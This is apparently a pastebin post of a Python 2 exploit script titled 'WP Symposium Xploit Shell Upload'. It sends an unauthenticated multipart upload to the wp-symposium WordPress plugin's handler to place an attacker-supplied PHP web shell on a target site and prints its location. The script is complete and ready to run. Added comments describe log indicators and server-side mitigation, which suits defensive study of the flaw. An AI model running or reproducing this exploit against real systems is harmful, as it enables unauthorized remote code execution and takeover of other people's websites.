AbdulMuttaqin

WP Symposium Xploit Shell Upload

Sep 2nd, 2018
  1.  
  2. # Http connection
  3. import urllib, urllib2, socket
  4. #
  5. import sys
  6. # String manipulator
  7. import string, random
  8. # Args management
  9. import optparse
  10. # File management
  11. import os, os.path, mimetypes
  12.  
  13. # Check url
def checkurl(url):
    """Return *url* unchanged when it begins with ``http://`` or ``https://``.

    Any other prefix prints an error message and ends the process with exit
    status 1. The comparison is a case-sensitive match on the leading
    characters only; nothing else about the URL is validated.
    """
    scheme_ok = url[:8] == "https://" or url[:7] == "http://"
    if scheme_ok:
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
  20.  
  21. # Check that the file exists and is readable
def checkfile(file):
    """Return *file* unless it is neither a regular file nor readable.

    When both tests fail, an error is printed and the process exits with
    status 1. The two tests are combined so that passing either one is
    enough: a path that is a regular file, or that ``os.access`` reports as
    readable (a directory, for instance), is returned as-is.
    """
    is_regular = os.path.isfile(file)
    if is_regular or os.access(file, os.R_OK):
        return file
    print('[X] '+file+' file is missing or not readable')
    sys.exit(1)
  28. # Get file's mimetype
def get_content_type(filename):
    """Guess the MIME type of *filename* from its extension.

    Falls back to ``application/octet-stream`` when ``mimetypes`` has no
    guess. Only the name is inspected; the file content is never read.
    """
    guessed, _encoding = mimetypes.guess_type(filename)
    if guessed:
        return guessed
    return 'application/octet-stream'
  31.  
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Return a string of *size* characters drawn at random from *chars*.

    Characters come from the ``random`` module, one ``random.choice`` call
    per position; the default alphabet is ASCII letters and digits.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
  34.  
  35. # Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
   """Assemble the multipart/form-data body that the script POSTs.

   The body holds three text fields (``uploader_uid``, ``uploader_dir``,
   ``uploader_url``) followed by one file part named ``files[]``. The file
   part's filename is ``randShellName + ".php"`` and its content is the
   local file *payloadname*.

   Reads the module-level ``url_symposium_upload``, so that global must be
   assigned before this function is called.

   Review notes (defender view): every value in this body is chosen by the
   client, including the destination directory and the ``.php`` filename.
   Presumably the targeted handler accepts them without an authentication
   or extension check -- confirm against the plugin's advisory. In HTTP or
   WAF logs the request-level indicator is this set of field names together
   with a ``files[]`` part whose filename ends in ``.php``; the directory
   and file names are random per run and are not stable indicators.

   Returns:
       The body as one string with parts joined by CRLF.
   """

   # Text fields sent ahead of the file part.
   getfields = dict()
   getfields['uploader_uid'] = '1'
   # Destination directory requested by the client, relative to the handler.
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload

   # Whole local file is read into memory and sent as the file part's content.
   payloadcontent = open(payloadname).read()

   # Fixed boundary; the same literal appears in the Content-Type header
   # built at module level, and the two must match.
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   # One part per text field; part order follows the dict's iteration order.
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   # File part: a .php filename with a Content-Type guessed from the local name.
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   # Closing boundary, then an empty element so the body ends with CRLF.
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
  64.  
# ASCII-art banner; printed before the usage text and again before the upload
# attempt. NOTE(review): the string is not raw, so the backslash that ends the
# fourth art row acts as a line continuation (if no trailing whitespace follows
# it) and that row prints joined to the next one.
banner = """
  ____                      _        ____          _
/ ___| __ _ _ __ _   _  __| | __ _ / ___|___   __| | ___ _ __ ___
| |  _ / _` | '__| | | |/ _` |/ _` | |   / _ \ / _` |/ _ \ '__/ __|
| |_| | (_| | |  | |_| | (_| | (_| | |__| (_) | (_| |  __/ |  \__ \
 \____|\__,_|_|   \__,_|\__,_|\__,_|\____\___/ \__,_|\___|_|  |___/
"""
  72.  
# Script entry: parse arguments, build one multipart request and send it to the
# wp-symposium upload handler. Python 2 only (urllib2).
#
# Review notes (defender view):
#   * Network indicator: a multipart POST to
#     /wp-content/plugins/wp-symposium/server/php/index.php.
#   * The boundary string and User-Agent below are hard-coded, so they show up
#     verbatim in logs of this exact script; both are easy to change and are
#     weak indicators on their own.
#   * Mitigation is on the server: update or remove the plugin and deny PHP
#     execution in directories that accept uploads -- confirm the fixed
#     release against the vendor advisory.

# Command-line interface: target base URL, local file to send, socket timeout.
commandList = optparse.OptionParser('usage: %prog -t URL -f NAMASHELL.PHP [--timeout ]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
# Both -t and -f are required; otherwise show the banner and help, then exit 1.
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

# Each helper exits the process itself when validation fails.
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout

print(banner)

# Process-wide default timeout for sockets created after this call.
socket.setdefaulttimeout(timeout)

# Directory of the plugin's upload handler; also sent as the uploader_url field.
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'

# Boundary must equal LIMIT inside create_body_sh3ll_upl04d.
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

# Fresh 6-character names on every run, so the resulting file and directory
# names are not stable indicators.
randDirName = id_generator()
randShellName = id_generator()

bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)

# Static browser-like User-Agent; content-length is the length of the str body.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
    # Passing a data argument makes urllib2 issue a POST.
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()

    # Success is inferred from the response body alone: it must not contain
    # "error" and must be neither "0" nor empty. The uploaded file is not
    # requested afterwards to confirm it exists.
    if "error" in read or read == "0" or read == "":
       print("[X] Upload Failed :(")
    else:
       print("[>]Shell Uploaded")
       # Per this string the script expects the file under the handler
       # directory; a newly created .php file there is the on-disk artefact
       # to look for during triage.
       print("[--] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")

# HTTPError is caught first because it is a subclass of URLError.
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))